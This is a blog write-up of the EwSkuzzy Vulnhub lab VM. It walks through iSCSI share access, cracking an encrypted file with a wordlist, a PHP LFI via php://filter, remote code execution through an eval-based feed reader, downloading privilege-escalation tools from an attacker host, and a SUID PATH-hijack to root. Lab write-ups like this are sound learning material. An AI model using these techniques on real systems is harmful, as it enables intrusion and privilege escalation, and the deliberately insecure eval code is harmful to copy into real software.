Ewwww SCSI (EwSkuzzy @vulnhub)

Another Vulnhub VM: EwSkuzzy form @vortexau

Bildschirmfoto 2017-03-21 um 12.17.23.png

So last evening I decided its time for another Vulnhub. Luckily someone in #vulnhub was discussing EwSkuzzy!

As the vulnhub.com description warned that it might be problematic in VMware I was glad that VMware Fusion imported it just fine!

Only issue I ran into was that no network interface was configured in VMware by default so I was happy to see that singleuser mode was not protected by password and I could quickly swap the default interface name in /etc/network/interfaces for VMwares ens33.

flag1{unpassworded iSCSI share}

While downloading the VM I thought “skuzzy sounds like SCSI! :D

And I was amused to get the following nmap output:

root@kali:~# nmap -p- -sC -sV 192.168.53.129

Starting Nmap 7.40 ( https://nmap.org ) at 2017-03-21 12:26 CET
Nmap scan report for 192.168.53.129
Host is up (0.00012s latency).
Not shown: 65532 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 89:c2:ae:12:d6:c5:19:4e:68:4a:28:e9:06:bd:9c:19 (RSA)
|_ 256 f0:0c:ae:37:10:d3:6d:a2:85:3a:77:04:06:94:f8:0a (ECDSA)
80/tcp open http nginx
|_http-server-header: nginx
|_http-title: Welcome!
3260/tcp open iscsi?
|_iscsi-info: ERROR: Script execution failed (use -d to debug)
MAC Address: 00:0C:29:DF:D6:01 (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 111.26 seconds

iSCSI \o/

I actually already found insecure iSCSI Shares in Pentests in the wild so I was very curios to see if there is a password unprotected iSCSI Share available on this port.

Lets enumerate:

root@kali:~# iscsiadm -m discovery -t st -p 192.168.53.129
192.168.53.129:3260,1 iqn.2017-02.local.skuzzy:storage.sys0

root@kali:~# iscsiadm -m node -p 192.168.53.129 --login --target iqn.2017-02.local.skuzzy:storage.sys0
Logging in to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.53.129,3260] (multiple)
Login to [iface: default, target: iqn.2017-02.local.skuzzy:storage.sys0, portal: 192.168.53.129,3260] successful.

root@kali:~# mount /dev/sdb /media/temp
root@kali:~# ls /media/temp
bobsdisk.dsk flag1.txt lost+found

root@kali:/media/temp# cat flag1.txt
Congratulations! You've discovered the first flag!

flag1{c0abc15976b98a478150c900ebb0c86f0327f4dd}

Let's see how you go with the next one...

We’ve got flag!

flag2{sensitive data in unpassworded ISCSI share}

What do we have here:

root@kali:/media/temp# mount bobsdisk.dsk /media/temp1
root@kali:/media/temp# ls /media/temp1
lost+found ToAlice.csv.enc ToAlice.eml

root@kali:/media/temp# file /media/temp1/ToAlice*
/media/temp1/ToAlice.csv.enc: openssl enc'd data with salted password
/media/temp1/ToAlice.eml: ASCII text, with very long lines

Lets see what bob has to say to alice:

G'day Alice,

You know what really annoys me? How you and I ended up being used, like some kind of guinea pigs, by the RSA crypto wonks as actors in their designs for public key crypto... I don't recall ever being asked if that was ok? I never got even one cent of royalties from them!? RSA have made Millions on our backs, and it's time we took a stand!

Starting now, today, immediately, I'm never using asymmetric key encryption again, and it's all symmetric keys from here on out. All my files and documents will be encrypted with that popular symmetric crypto algorithm. Uh. Yeah, I can't pronounce its original name. I don't even know what the letters in its other name stand for - but really - that's not important. A bloke at my local hackerspace says its the beez kneez, ridgy-didge, real-deal, the best there is when it comes to symmetric key crypto, he has heaps of stickers on his laptop so I guess it means he knows, right? Anyway, he said it won some big important competition among crypto geeks in October 2000? Lucky Y2K didn't happen then, I suppose or that would have been one boring party!

Anyway this algorithm sounded good to me. I used the updated version that won the competition.

You know what happened to me this morning? My kids, the little darlings, had spilled their fancy 256 bit Lego kit all over the damn floor. Sigh. Of course I trod on it making my coffee, the level of pain really does ROCKYOU to the core when it happens! It's hard to stay mad though, I really love Lego, the way those blocks chain togeather really does make them work brilliantly. My favourite new Spanish swear came in handy when this happened... supercalifragilisticoespialidoso !

Anyway, given I'm not not using asymmetric crypto any longer, I destroyed my private key, so the public key you have for me may as well be deleted. I've got some notes for you which might help in your current case, I've encrypted it using my new favourite symmetric key crypto algorithm, it should be on the disk with this note. The key is, well, one awesome word I learnt in my recent Spanish classes!

Give me a shout when you're down this way again, we'll catch up for coffee (once the Lego is removed from my foot) :)

Cheers,

Bob.

PS: Oh, before I forget, the hacker-kid who told me how to use this new algorithm, said it was very important I used the command option -md sha256 when decrypting. Why? Who knows? He said something about living on the bleeding-edge...

PPS: flag2{054738a5066ff56e0a4fc9eda6418478d23d3a7f}

flag3{not protection encryption keys}

Okay from Bobs mail to Alice we know:

  • Bob does not like to be used as a crypto-rolemodel
  • He used symetric crypto (openssl) to encrypt his attachment to alice
  • His password was likely  “supercalifragilisticoespialidoso”
  • This password likely also exists in the rockyou wordlist

So lets verify this:

To bruteforce the password I used “brutforce-salted-openssl” from this github repo.

One git clone later:

root@kali:/opt/bruteforce-salted-openssl# bruteforce-salted-openssl -t 9 -f /usr/share/wordlists/rockyou.txt -d sha256 -c aes256 /media/temp1/ToAlice.csv.enc
Warning: using dictionary mode, ignoring options -b, -e, -l, -m and -s.

Tried passwords: 3475548
Tried passwords per second: 868887.000000
Last tried password: supercOOl
Password candidate: supercalifragilisticoespialidoso

Supercali-BINGO!

Now lets look inside the csv:

root@kali:/media/temp# openssl enc -d -aes256 -salt -in /media/temp1/ToAlice.csv.enc -out /tmp/output.csv
enter aes-256-cbc decryption password:

root@kali:/media/temp# cat /tmp/output.csv 
Web Path,Reason
5560a1468022758dba5e92ac8f2353c0,Black hoodie. Definitely a hacker site! 
c2444910794e037ebd8aaf257178c90b,Nice clean well prepped site. Nothing of interest here.
flag3{2cce194f49c6e423967b7f72316f48c5caf46e84},The strangest URL I've seen? What is it?

Note for later how it says that flag3 is a URL. How long is this string?

flag4{beating the old php pony}

A nice decoy site on the first URL from the CSV:

Bildschirmfoto 2017-03-21 um 13.36.03.png

Some more decoy b64 string in the source, however I leave this for the eager writers to document ;)

Lets look behind door nr. 2:

Bildschirmfoto 2017-03-21 um 13.39.20.png

Nice! A selfwritten php website, this looks promising! :)

Oh no he did’t:

 

 

OH NOES *shockedface*:

Bildschirmfoto 2017-03-21 um 13.44.24.png

LFI’ception!

My guess is that the $_GET[‘p’] is a php include so lets try to read some sourcecode php filter style:

root@kali:/media/temp# curl http://192.168.53.129/c2444910794e037ebd8aaf257178c90b/index.php?p=php://filter/convert.base64-encode/resource=flag.php
<!DOCTYPE html>
<html>
<head>
<title>I think you're on the right track now!</title>
<style>
div.container {
width: 100%;
border: 1px solid gray;
}

header, footer {
padding: 1em;
...
...
boring, shortened
...
...
overflow: hidden;
}
</style>
</head>
<body>
<div class="container">

&nbsp;

<header>
<h1>My great web-app!</h1>
&nbsp;

</header>&nbsp;
<ul>
<ul>
 	<li><a href="?p=welcome">Welcome</a></li>
</ul>
</ul>
&nbsp;
<ul>
<ul>
 	<li><a href="?p=flag">Flag</a></li>
</ul>
</ul>
&nbsp;
<ul>
<ul>
 	<li><a href="?p=party">Let's Party!</a></li>
</ul>
</ul>
&nbsp;
<ul>
<ul>
 	<li><a href="?p=reader">Feed Reader</a></li>
</ul>
</ul>
&nbsp;

&nbsp;

<article>PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==</article>&nbsp;

<footer>Hack the Planet!</footer>&nbsp;

</div>
&lt;/body&gt; &lt;/html&gt;

&nbsp;

Lets look at the source of flag.php:

root@kali:/media/temp# echo "PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmxhZzwvaDE+CjxwPkhtbS4gTG9va2luZyBmb3IgYSBmbGFnPyBDb21lIG9uLi4uIEkgaGF2ZW4ndCBtYWRlIGl0IGVhc3kgeWV0LCBkaWQgeW91IHRoaW5rIEkgd2FzIGdvaW5nIHRvIHRoaXMgdGltZT88L3A+CjxpbWcgc3JjPSJ0cm9sbGZhY2UucG5nIiAvPgo8P3BocAovLyBPaywgb2suIEhlcmUncyB5b3VyIGZsYWchIAovLwovLyBmbGFnNHs0ZTQ0ZGIwZjFlZGMzYzM2MWRiZjU0ZWFmNGRmNDAzNTJkYjkxZjhifQovLyAKLy8gV2VsbCBkb25lLCB5b3UncmUgZG9pbmcgZ3JlYXQgc28gZmFyIQovLyBOZXh0IHN0ZXAuIFNIRUxMIQovLwovLyAKLy8gT2guIFRoYXQgZmxhZyBhYm92ZT8gWW91J3JlIGdvbm5hIG5lZWQgaXQuLi4gCj8+Cg==" | base64 -d
&lt;?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?&gt;
&lt;h1&gt;Flag&lt;/h1&gt;
&lt;p&gt;Hmm. Looking for a flag? Come on... I haven't made it easy yet, did you think I was going to this time?&lt;/p&gt;
&lt;img src="trollface.png" /&gt;
&lt;?php
// Ok, ok. Here's your flag! 
//
// flag4{4e44db0f1edc3c361dbf54eaf4df40352db91f8b}
// 
// Well done, you're doing great so far!
// Next step. SHELL!
//
// 
// Oh. That flag above? You're gonna need it... 
?&gt;

We’ve got flag!

And another hint!

flag5{from shell over suid to root}

Last flag it is!

But First we need shell! I like shells!

Lets look at this strange reader.php:

root@kali:/media/temp# curl http://192.168.53.129/c2444910794e037ebd8aaf257178c90b/index.php?p=php://filter/convert.base64-encode/resource=reader.php
&lt;!DOCTYPE html&gt;
&lt;html&gt;
&lt;head&gt;
...nothing to see here, move along...
&lt;/head&gt;
&lt;body&gt;</pre>
<div class="container">

&nbsp;

<header>
<h1>My great web-app!</h1>
&nbsp;

</header>&nbsp;
<ul>
<ul>
 	<li><a href="?p=welcome">Welcome</a></li>
</ul>
</ul>
&nbsp;
<ul>
<ul>
 	<li><a href="?p=flag">Flag</a></li>
</ul>
</ul>
&nbsp;
<ul>
<ul>
 	<li><a href="?p=party">Let's Party!</a></li>
</ul>
</ul>
&nbsp;
<ul>
<ul>
 	<li><a href="?p=reader">Feed Reader</a></li>
</ul>
</ul>
&nbsp;

&nbsp;

<article>PD9waHAKZGVmaW5lZCAoJ1ZJQUlOREVYJykgb3IgZGllKCdPb29vaCEgU28gY2xvc2UuLicpOwo/Pgo8aDE+RmVlZCBSZWFkZXI8L2gxPgo8P3BocAppZihpc3NldCgkX0dFVFsndXJsJ10pKSB7CiAgICAkdXJsID0gJF9HRVRbJ3VybCddOwp9IGVsc2UgewogICAgcHJpbnQoIjxhIGhyZWY9XCI/cD1yZWFkZXImdXJsPWh0dHA6Ly8xMjcuMC4wLjEvYzI0NDQ5MTA3OTRlMDM3ZWJkOGFhZjI1NzE3OGM5MGIvZGF0YS50eHRcIj5Mb2FkIEZlZWQ8L2E+Iik7Cn0KCmlmKGlzc2V0KCR1cmwpICYmIHN0cmxlbigkdXJsKSAhPSAnJykgewoKICAgIC8vIFNldHVwIHNvbWUgdmFyaWFibGVzLgogICAgJHNlY3JldG9rID0gZmFsc2U7CiAgICAka2V5bmVlZGVkID0gdHJ1ZTsKCiAgICAvLyBMb2NhbGhvc3QgYXMgYSBzb3VyY2UgZG9lc24ndCBuZWVkIHRvIHVzZSB0aGUga2V5LgogICAgaWYocHJlZ19tYXRjaCgiI15odHRwOi8vMTI3LjAuMC4xIyIsICR1cmwpKSB7CiAgICAgICAgJGtleW5lZWRlZCA9IGZhbHNlOwogICAgICAgICRzZWNyZXRvayA9IHRydWU7CiAgICB9CgogICAgLy8gSGFuZGxlIHRoZSBrZXkgdmFsaWRhdGlvbiB3aGVuIGl0J3MgbmVlZGVkLgogICAgaWYoJGtleW5lZWRlZCkgewogICAgICAgICRrZXkgPSAkX0dFVFsna2V5J107CiAgICAgICAgaWYoaXNfYXJyYXkoJGtleSkpIHsKICAgICAgICAgICAgZGllKCJBcnJheSB0cmljayBpcyBtaXRpZ2F0ZWQgOykiKTsKICAgICAgICB9CiAgICAgICAgaWYoaXNzZXQoJGtleSkgJiYgc3RybGVuKCRrZXkpID09ICc0NycpIHsKCSAgICAkaGFzaGVka2V5ID0gaGFzaCgnc2hhMjU2JywgJGtleSk7CiAgICAgICAgICAgICRzZWNyZXQgPSAiNWNjZDBkYmRlZWZiZWUwNzhiODhhNmU1MmRiOGMxY2FhOGRkODMxNWYyMjdmZTFlNmFlZTZiY2I2ZGI2MzY1NiI7CgogICAgICAgICAgICAvLyBJZiB5b3UgY2FuIHVzZSB0aGUgZm9sbG93aW5nIGNvZGUgZm9yIGEgdGltaW5nIGF0dGFjawogICAgICAgICAgICAvLyB0aGVuIGdvb2QgbHVjayA6KSBCdXQuLiBZb3UgaGF2ZSB0aGUgc291cmNlIGFueXdheSwgcmlnaHQ/IDopIAoJICAgIGlmKHN0cmNtcCgkaGFzaGVka2V5LCAkc2VjcmV0KSA9PSAwKSB7CiAgICAgICAgICAgICAgICAkc2VjcmV0b2sgPSB0cnVlOwogICAgICAgICAgICB9IGVsc2UgewogICAgICAgICAgICAgICAgZGllKCJTb3JyeS4uLiBBdXRoZW50aWNhdGlvbiBmYWlsZWQuIEtleSB3YXMgaW52YWxpZC4iKTsKCSAgICB9CgogICAgICAgIH0gZWxzZSB7CiAgICAgICAgICAgIGRpZSgiQXV0aGVudGljYXRpb24gaW52YWxpZC4gWW91IG1pZ2h0IG5lZWQgYSBrZXkuIik7CiAgICAgICAgfQogICAgfQoKICAgIC8vIEp1c3QgdG8gbWFrZSBzdXJlIHRoZSBhYm92ZSBrZXkgY2hlY2sgd2FzIHBhc3NlZC4KICAgIGlmKCEkc2VjcmV0b2spIHsKICAgICAgICBkaWUoIlNvbWV0aGluZyB3ZW50IHdyb25nIHdpdGggdGhlIGF1dGhlbnRpY2F0aW9uIHByb2Nlc3MiKTsKICAgIH0KCiAgICAvLyBOb3cgbG9hZCB0aGUgY29udGVudHMgb2YgdGhlIGZpbGUgd2UgYXJlIHJlYWRpbmcsIGFuZCBwYXJzZQogICAgLy8gdGhlIHN1cGVyIGF3ZXNvbWVuZXNzIG9mIGl0cyBjb250ZW50cyEKICAgICRmID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7CgogICAgJHRleHQgPSBwcmVnX3NwbGl0KCIvIyN0ZXh0IyMvcyIsICRmKTsKCiAgICBpZihpc3NldCgkdGV4dFsnMSddKSAmJiBzdHJsZW4oJHRleHRbJzEnXSkgPiAwKSB7CiAgICAgICAgcHJpbnQoJHRleHRbJzEnXSk7CiAgICB9CgogICAgcHJpbnQgIjxiciAvPjxiciAvPiI7CgogICAgJHBocCA9IHByZWdfc3BsaXQoIi8jI3BocCMjL3MiLCAkZik7CgogICAgaWYoaXNzZXQoJHBocFsnMSddKSAmJiBzdHJsZW4oJHBocFsnMSddKSA+IDApIHsgCiAgICAgICAgZXZhbCgkcGhwWycxJ10pOwogICAgICAgIC8vICJJZiBFdmFsIGlzIHRoZSBhbnN3ZXIsIHlvdSdyZSBhc2tpbmcgdGhlIHdyb25nIHF1ZXN0aW9uISIgLSBTRwogICAgICAgIC8vIEl0IGh1cnRzIG1lIHRvIHdyaXRlIGluc2VjdXJlIGNvZGUgbGlrZSB0aGlzLCBidXQgaXQgaXMgaW4gdGhlCiAgICAgICAgLy8gbmFtZSBvZiBlZHVjYXRpb24sIGFuZCBGVU4sIHNvIEknbGwgbGV0IGl0IHNsaWRlIHRoaXMgdGltZS4KICAgIH0KfQoK</article>&nbsp;

<footer>Hack the Planet!</footer>&nbsp;

</div>
&lt;/body&gt; &lt;/html&gt;

 

Bildschirmfoto 2017-03-21 um 13.51.56.png

Lets read it:

root@kali:/media/temp# echo "PD9w...insert long string here...KfQoK" | base64 -d
&lt;?php
defined ('VIAINDEX') or die('Ooooh! So close..');
?&gt;
&lt;h1&gt;Feed Reader&lt;/h1&gt;
&lt;?php
if(isset($_GET['url'])) {
 $url = $_GET['url'];
} else {
 print("&lt;a href=\"?p=reader&amp;url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt\"&gt;Load Feed&lt;/a&gt;");
}

if(isset($url) &amp;&amp; strlen($url) != '') {

 // Setup some variables.
 $secretok = false;
 $keyneeded = true;

 // Localhost as a source doesn't need to use the key.
 if(preg_match("#^http://127.0.0.1#", $url)) {
 $keyneeded = false;
 $secretok = true;
 }

 // Handle the key validation when it's needed.
 if($keyneeded) {
 $key = $_GET['key'];
 if(is_array($key)) {
 die("Array trick is mitigated ;)");
 }
 if(isset($key) &amp;&amp; strlen($key) == '47') {
 $hashedkey = hash('sha256', $key);
 $secret = "5ccd0dbdeefbee078b88a6e52db8c1caa8dd8315f227fe1e6aee6bcb6db63656";

 // If you can use the following code for a timing attack
 // then good luck :) But.. You have the source anyway, right? :) 
 if(strcmp($hashedkey, $secret) == 0) {
 $secretok = true;
 } else {
 die("Sorry... Authentication failed. Key was invalid.");
 }

 } else {
 die("Authentication invalid. You might need a key.");
 }
 }

 // Just to make sure the above key check was passed.
 if(!$secretok) {
 die("Something went wrong with the authentication process");
 }

 // Now load the contents of the file we are reading, and parse
 // the super awesomeness of its contents!
 $f = file_get_contents($url);

 $text = preg_split("/##text##/s", $f);

 if(isset($text['1']) &amp;&amp; strlen($text['1']) &gt; 0) {
 print($text['1']);
 }

 print "&lt;br /&gt;&lt;br /&gt;";

 $php = preg_split("/##php##/s", $f);

 if(isset($php['1']) &amp;&amp; strlen($php['1']) &gt; 0) { 
 eval($php['1']);
 // "If Eval is the answer, you're asking the wrong question!" - SG
 // It hurts me to write insecure code like this, but it is in the
 // name of education, and FUN, so I'll let it slide this time.
 }
}

So we can probably do RFI with the feed reader URL:

http://192.168.53.129/c2444910794e037ebd8aaf257178c90b/index.php?p=reader&url=http://127.0.0.1/c2444910794e037ebd8aaf257178c90b/data.txt

Lets test without the key:

Bildschirmfoto 2017-03-21 um 13.57.23.png

Now lets test a random 47digit key:

Bildschirmfoto 2017-03-21 um 13.59.15.png

Now if we only had a 47 digit key already from somewhere 🤔

Btw: I tried to bruteforce the sha256 hash from the php source but when hashcat told me 47 digits will take >10 years and I had no luck with rockyou.txt or linkedin.txt I remembered all the previous spoiler/hints:

Bildschirmfoto 2017-03-21 um 14.02.06.png

Bildschirmfoto 2017-03-21 um 14.02.26.png

Bildschirmfoto 2017-03-21 um 14.02.38.png

Guess what? The entire flag-string is 47 digits and with flag4{…} it finally worked:

Bildschirmfoto 2017-03-21 um 14.06.44.png

So lets provide some php code in the correct format the reader.php source expects:

Bildschirmfoto 2017-03-21 um 14.09.07.png

And we’ve got shell:

Bildschirmfoto 2017-03-21 um 14.21.09.png

Now lets do some basic privesc enumeration:

$ cd /tmp
$ wget http://192.168.53.131/linux-privtools.tar
--2017-03-22 00:01:56-- http://192.168.53.131/linux-privtools.tar
Connecting to 192.168.53.131:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 133120 (130K) [application/x-tar]
Saving to: 'linux-privtools.tar'

 0K .......... .......... .......... .......... .......... 38% 29.6M 0s
 50K .......... .......... .......... .......... .......... 76% 28.6M 0s
 100K .......... .......... .......... 100% 28.5M=0.004s

2017-03-22 00:01:56 (29.0 MB/s) - 'linux-privtools.tar' saved [133120/133120]

$ tar xf linux-privtools.tar
$ chmod +x LinEnum.sh 

#########################################################
# Local Linux Enumeration & Privilege Escalation Script #
#########################################################
# www.rebootuser.com
# 

Debug Info
thorough tests = enabled


Scan started at:
Wed Mar 22 00:05:56 ACDT 2017


### SYSTEM ##############################################
Kernel information:
Linux skuzzy 4.4.0-64-generic #85-Ubuntu SMP Mon Feb 20 11:50:30 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux


Kernel information (continued):
Linux version 4.4.0-64-generic (buildd@lgw01-56) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.4) ) #85-Ubuntu SMP Mon Feb 20 11:50:30 UTC 2017


Specific release information:
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=16.04
DISTRIB_CODENAME=xenial
DISTRIB_DESCRIPTION="Ubuntu 16.04.2 LTS"
NAME="Ubuntu"
VERSION="16.04.2 LTS (Xenial Xerus)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 16.04.2 LTS"
VERSION_ID="16.04"
HOME_URL="http://www.ubuntu.com/"
SUPPORT_URL="http://help.ubuntu.com/"
BUG_REPORT_URL="http://bugs.launchpad.net/ubuntu/"
VERSION_CODENAME=xenial
UBUNTU_CODENAME=xenial


Hostname:
skuzzy

...
Lots more findings!
...

SUID files:
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/snapd/snap-confine
/usr/bin/newgrp
/usr/bin/gpasswd
/usr/bin/chsh
/usr/bin/newuidmap
/usr/bin/pkexec
/usr/bin/chfn
/usr/bin/at
/usr/bin/newgidmap
/usr/bin/passwd
/usr/bin/sudo
/bin/fusermount
/bin/mount
/bin/su
/bin/ntfs-3g
/bin/ping
/bin/ping6
/bin/umount
/opt/alicebackup
...

Here we go, a SUID file called alicebackup!

Lets strings it:

$ strings /opt/alicebackup 
/lib64/ld-linux-x86-64.so.2
libc.so.6
setuid
system
__cxa_finalize
setgid
__libc_start_main
_ITM_deregisterTMCloneTable
__gmon_start__
_Jv_RegisterClasses
_ITM_registerTMCloneTable
GLIBC_2.2.5
=i 
=J 
AWAVA
AUATL
[]A\A]A^A_
scp /tmp/special bob@alice.home:~
;*3$"
GCC: (Debian 6.3.0-6) 6.3.0 20170205
crtstuff.c
__JCR_LIST__
deregister_tm_clones
__do_global_dtors_aux
completed.6962
__do_global_dtors_aux_fini_array_entry
frame_dummy
__frame_dummy_init_array_entry
root.c
__FRAME_END__
__JCR_END__
__init_array_end
_DYNAMIC
__init_array_start
__GNU_EH_FRAME_HDR
_GLOBAL_OFFSET_TABLE_
__libc_csu_fini
_ITM_deregisterTMCloneTable
_edata
system@@GLIBC_2.2.5
__libc_start_main@@GLIBC_2.2.5
__data_start
__gmon_start__
__dso_handle
_IO_stdin_used
__libc_csu_init
__bss_start
main
setgid@@GLIBC_2.2.5
_Jv_RegisterClasses
__TMC_END__
_ITM_registerTMCloneTable
setuid@@GLIBC_2.2.5
__cxa_finalize@@GLIBC_2.2.5
.symtab
.strtab
.shstrtab
.interp
.note.ABI-tag
.note.gnu.build-id
.gnu.hash
.dynsym
.dynstr
.gnu.version
.gnu.version_r
.rela.dyn
.rela.plt
.init
.plt.got
.text
.fini
.rodata
.eh_frame_hdr
.eh_frame
.init_array
.fini_array
.jcr
.dynamic
.got.plt
.data
.bss
.comment

What do we have here, a relative call to scp:

scp /tmp/special bob@alice.home:~

Lets export /tmp to path and place our own scp file there:

Bildschirmfoto 2017-03-21 um 14.43.05.png

The end…

This was a really fun VM, straight forward or nice hints at the right moments.

Thanks alot @vortexau!

BR
Sebastian

 

Advertisements

About SebastianB

read it in my blog
This entry was posted in boot2root, vulnhub. Bookmark the permalink.

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s